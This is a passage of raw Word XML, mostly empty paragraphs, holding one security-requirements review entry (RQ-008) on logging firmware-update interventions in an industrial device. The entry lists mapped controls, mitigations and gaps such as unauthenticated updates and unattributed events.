          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="138B1ED6" w14:textId="77777777" w:rsidR="00CA5768" w:rsidRPr="006D5B99" w:rsidRDefault="00CA5768" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="128C4BC4" w14:textId="77777777" w:rsidR="00CA5768" w:rsidRPr="006D5B99" w:rsidRDefault="00CA5768" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F064460" w14:textId="77777777" w:rsidR="00CA5768" w:rsidRPr="006D5B99" w:rsidRDefault="00CA5768" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6916F700" w14:textId="77777777" w:rsidR="00CA5768" w:rsidRPr="006D5B99" w:rsidRDefault="00CA5768" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1BCEFB79" w14:textId="77777777" w:rsidR="00CA5768" w:rsidRPr="006D5B99" w:rsidRDefault="00CA5768" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73E8FAAC" w14:textId="77777777" w:rsidR="00CA5768" w:rsidRPr="006D5B99" w:rsidRDefault="00CA5768" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41B22E99" w14:textId="77777777" w:rsidR="00CA5768" w:rsidRPr="006D5B99" w:rsidRDefault="00CA5768" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3AF53939" w14:textId="77777777" w:rsidR="00CA5768" w:rsidRPr="006D5B99" w:rsidRDefault="00CA5768" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C2158BC" w14:textId="77777777" w:rsidR="00CA5768" w:rsidRPr="006D5B99" w:rsidRDefault="00CA5768" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4FF728F0" w14:textId="77777777" w:rsidR="00CA5768" w:rsidRPr="006D5B99" w:rsidRDefault="00CA5768" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57854C6F" w14:textId="77777777" w:rsidR="001938D1" w:rsidRPr="006D5B99" w:rsidRDefault="001938D1" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C1DBC1A" w14:textId="77777777" w:rsidR="001938D1" w:rsidRPr="006D5B99" w:rsidRDefault="001938D1" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4402AB5A" w14:textId="77777777" w:rsidR="001938D1" w:rsidRPr="006D5B99" w:rsidRDefault="001938D1" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4FD959EC" w14:textId="77777777" w:rsidR="001938D1" w:rsidRPr="006D5B99" w:rsidRDefault="001938D1" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3662D017" w14:textId="77777777" w:rsidR="001938D1" w:rsidRPr="006D5B99" w:rsidRDefault="001938D1" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E346C77" w14:textId="77777777" w:rsidR="001938D1" w:rsidRPr="006D5B99" w:rsidRDefault="001938D1" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E81CC57" w14:textId="77777777" w:rsidR="001938D1" w:rsidRPr="006D5B99" w:rsidRDefault="001938D1" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31D74279" w14:textId="77777777" w:rsidR="001938D1" w:rsidRPr="006D5B99" w:rsidRDefault="001938D1" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5968B06B" w14:textId="77777777" w:rsidR="001938D1" w:rsidRPr="006D5B99" w:rsidRDefault="001938D1" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F1A3657" w14:textId="77777777" w:rsidR="001938D1" w:rsidRPr="006D5B99" w:rsidRDefault="001938D1" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="444ECD49" w14:textId="77777777" w:rsidR="001938D1" w:rsidRPr="006D5B99" w:rsidRDefault="001938D1" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="376DD699" w14:textId="77777777" w:rsidR="00A1176F" w:rsidRPr="006D5B99" w:rsidRDefault="00A1176F" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E628094" w14:textId="77777777" w:rsidR="00A1176F" w:rsidRPr="006D5B99" w:rsidRDefault="00A1176F" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33A0C5D8" w14:textId="77777777" w:rsidR="00CA5768" w:rsidRPr="006D5B99" w:rsidRDefault="00CA5768" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57C8C0D8" w14:textId="77777777" w:rsidR="00105368" w:rsidRPr="006D5B99" w:rsidRDefault="00105368" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D4F8AD5" w14:textId="15E95AB0" w:rsidR="009C0A46" w:rsidRPr="006D5B99" w:rsidRDefault="009C0A46" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="double"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="double"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>REQUIREMENT 8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F8E0CD6" w14:textId="77777777" w:rsidR="009C0A46" w:rsidRPr="006D5B99" w:rsidRDefault="009C0A46" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Step 1: Critical Review &amp; Theoretical Validation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="646A5D65" w14:textId="2C52568F" w:rsidR="006D65EB" w:rsidRPr="006D5B99" w:rsidRDefault="007F5A7B" w:rsidP="00AC18F9">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">MVO-ID: </w:t>
      </w:r>
      <w:r w:rsidR="006D65EB" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>RQ-008</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F8DE419" w14:textId="2E79D1EB" w:rsidR="006D65EB" w:rsidRPr="006D5B99" w:rsidRDefault="006D65EB" w:rsidP="00AC18F9">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>MVO Requirement Text:</w:t>
      </w:r>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> The system shall collect evidence of any legitimate or illegitimate intervention in the software installed on it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61748F50" w14:textId="68ECC036" w:rsidR="006D65EB" w:rsidRPr="006D5B99" w:rsidRDefault="007F5A7B" w:rsidP="00AC18F9">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>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2A788C" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="006D65EB" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> CR 2.8,</w:t>
      </w:r>
      <w:r w:rsidR="00312070" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> CR 2.9, CR 2.10</w:t>
      </w:r>
      <w:r w:rsidR="00092B56" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> CR 2.11, </w:t>
      </w:r>
      <w:r w:rsidR="006D65EB" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> CR 2.12</w:t>
      </w:r>
      <w:r w:rsidR="00312070" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, EDR 2.13, CR 3.9, CR 6.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FAAD00C" w14:textId="12D3549A" w:rsidR="006D65EB" w:rsidRPr="006D5B99" w:rsidRDefault="007F5A7B" w:rsidP="00AC18F9">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Target Assets: </w:t>
      </w:r>
      <w:r w:rsidR="006D65EB" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>D (subject of intervention); G (software-invention trigger); I (evidence)</w:t>
      </w:r>
      <w:r w:rsidR="00622F32" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, F (Domain separation)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66FC29FC" w14:textId="42D6BD3A" w:rsidR="006D65EB" w:rsidRPr="006D5B99" w:rsidRDefault="00196EB6" w:rsidP="00AC18F9">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">STRIDE: </w:t>
      </w:r>
      <w:r w:rsidR="007F5A7B" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006D65EB" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001823B7" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="00622F32" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Tampering, )</w:t>
      </w:r>
      <w:r w:rsidR="00D86735" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006D65EB" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Repudiation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BAAD8A6" w14:textId="77777777" w:rsidR="007E0FF7" w:rsidRPr="006D5B99" w:rsidRDefault="007F5A7B" w:rsidP="00AC18F9">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Security Function (Mitigation): </w:t>
      </w:r>
      <w:r w:rsidR="006D65EB" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DB80B5F" w14:textId="0CB78CA8" w:rsidR="00A779E7" w:rsidRPr="006D5B99" w:rsidRDefault="00A779E7" w:rsidP="00AC18F9">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>COM Error Log: FW-update actions, self-detected errors, SysCom timeout (SRIO-10665).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6898FB6C" w14:textId="118C66AA" w:rsidR="00A779E7" w:rsidRPr="006D5B99" w:rsidRDefault="00A779E7" w:rsidP="00AC18F9">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SysCom update command/response events: USER_SYS_RSP_UPDATE_* (SRIO-10785).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FF25C1D" w14:textId="4546796E" w:rsidR="00A779E7" w:rsidRPr="006D5B99" w:rsidRDefault="00A779E7" w:rsidP="00AC18F9">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/firmware/version + I&amp;M0 SOFTWARE_REVISION delta: Version change is observable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FC4A45F" w14:textId="151961A5" w:rsidR="00A779E7" w:rsidRPr="006D5B99" w:rsidRDefault="00A779E7" w:rsidP="00AC18F9">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Update-state LED sequence: US green / FS on fail (SRIO-11359 ff.).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69BD4A92" w14:textId="042DF228" w:rsidR="007E0FF7" w:rsidRPr="006D5B99" w:rsidRDefault="00A779E7" w:rsidP="00AC18F9">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Debug/test interface declared development</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C0F1293" w14:textId="77777777" w:rsidR="00506E31" w:rsidRPr="006D5B99" w:rsidRDefault="007F5A7B" w:rsidP="00AC18F9">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Identified Gap: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C3C0642" w14:textId="30EB23C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w:t>
      </w:r>
      <w:r w:rsidR="00BA5770" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">: Events recorded without actor identity; no user auth on the FW-update path (password removed, SRIO-8299) </w:t>
      </w:r>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> CR 2.12 unmet. An illegitimate intervention avoiding the official path is unrecorded/unattributable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45C8DB08" w14:textId="192B487F"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6D5B99" w:rsidRDefault="003E642C" w:rsidP="00AC18F9">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">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6D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> RQ-012.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76CF9128" w14:textId="786E576A" w:rsidR="009E26C9" w:rsidRPr="006D5B99" w:rsidRDefault="003E642C" w:rsidP="00AC18F9">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>G-4: Production_fuse exclusion (EDR 2.13); a re-probe still generates no log entry.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7624C7BC" w14:textId="77777777" w:rsidR="008903AE" w:rsidRPr="006D5B99" w:rsidRDefault="008903AE" w:rsidP="000409F3">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03CAEEC0" w14:textId="77777777" w:rsidR="008D6AA2" w:rsidRPr="006D5B99" w:rsidRDefault="008D6AA2" w:rsidP="000409F3">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00272A3D" w14:textId="77777777" w:rsidR="008D6AA2" w:rsidRPr="006D5B99" w:rsidRDefault="008D6AA2" w:rsidP="000409F3">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B7619C9" w14:textId="77777777" w:rsidR="008D6AA2" w:rsidRPr="006D5B99" w:rsidRDefault="008D6AA2" w:rsidP="000409F3">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B1D0F6A" w14:textId="77777777" w:rsidR="008D6AA2" w:rsidRPr="006D5B99" w:rsidRDefault="008D6AA2" w:rsidP="000409F3">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="362B4874" w14:textId="77777777" w:rsidR="008D6AA2" w:rsidRPr="006D5B99" w:rsidRDefault="008D6AA2" w:rsidP="000409F3">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26FF1B41" w14:textId="77777777" w:rsidR="008D6AA2" w:rsidRPr="006D5B99" w:rsidRDefault="008D6AA2" w:rsidP="000409F3">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6240F821" w14:textId="77777777" w:rsidR="008D6AA2" w:rsidRPr="006D5B99" w:rsidRDefault="008D6AA2" w:rsidP="000409F3">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="397B46B4" w14:textId="77777777" w:rsidR="008D6AA2" w:rsidRPr="006D5B99" w:rsidRDefault="008D6AA2" w:rsidP="000409F3">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="416B39B1" w14:textId="77777777" w:rsidR="008D6AA2" w:rsidRPr="006D5B99" w:rsidRDefault="008D6AA2" w:rsidP="000409F3">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C07AD37" w14:textId="77777777" w:rsidR="008D6AA2" w:rsidRPr="006D5B99" w:rsidRDefault="008D6AA2" w:rsidP="000409F3">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D12BA27" w14:textId="77777777" w:rsidR="009C0A46" w:rsidRPr="006D5B99" w:rsidRDefault="009C0A46" w:rsidP="007702A5">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">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6D5B99" w:rsidRDefault="00B73A1A" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3969" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="68BF3DD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0BB5562D"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46B7BEBC"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121D099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6D5B99" w:rsidRDefault="00B73A1A" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
            </w:pPr>
